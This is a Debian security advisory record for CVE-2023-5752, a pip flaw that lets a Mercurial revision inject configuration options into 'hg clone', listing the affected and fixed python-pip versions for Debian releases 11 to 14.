DEBIAN-CVE-2023-5752

When installing a package from a Mercurial VCS URL (ie "pip install hg+...") with pip prior to v23.3, the specified Mercurial revision could be used to inject arbitrary configuration options to the "hg clone" call (ie "--config"). Controlling the Mercurial configuration can modify how and which repository is installed. This vulnerability does not affect users who aren't installing from Mercurial.

References

https://security-tracker.debian.org/tracker/CVE-2023-5752

Affected packages

Debian:11 / python-pip

Package

Name: python-pip
Purl: pkg:deb/debian/python-pip?arch=source

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

20.3.4-4+deb11u2

Affected versions

20.*

20.3.4-4

20.3.4-4+deb11u1

Ecosystem specific

{
    "urgency": "not yet assigned"
}

Debian:12 / python-pip

Package

Name: python-pip
Purl: pkg:deb/debian/python-pip?arch=source

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Affected versions

23.*

23.0.1+dfsg-1

23.1.2+dfsg-1

23.1.2+dfsg-2

23.2+dfsg-1

23.2.1+dfsg-1

23.3+dfsg-1

24.*

24.0+dfsg-1

24.0+dfsg-2

24.1+dfsg-1

24.1.1+dfsg-1

24.2+dfsg-1

24.3.1+dfsg-1

25.*

25.0+dfsg-1

25.0.1+dfsg-1

25.1+dfsg-1

25.1.1+dfsg-1

25.2+dfsg-1

25.3+dfsg-1

Ecosystem specific

{
    "urgency": "not yet assigned"
}

Debian:13 / python-pip

Package

Name: python-pip
Purl: pkg:deb/debian/python-pip?arch=source

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

23.3+dfsg-1

Ecosystem specific

{
    "urgency": "not yet assigned"
}

Debian:14 / python-pip

Package

Name: python-pip
Purl: pkg:deb/debian/python-pip?arch=source

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

23.3+dfsg-1

Ecosystem specific

{
    "urgency": "not yet assigned"
}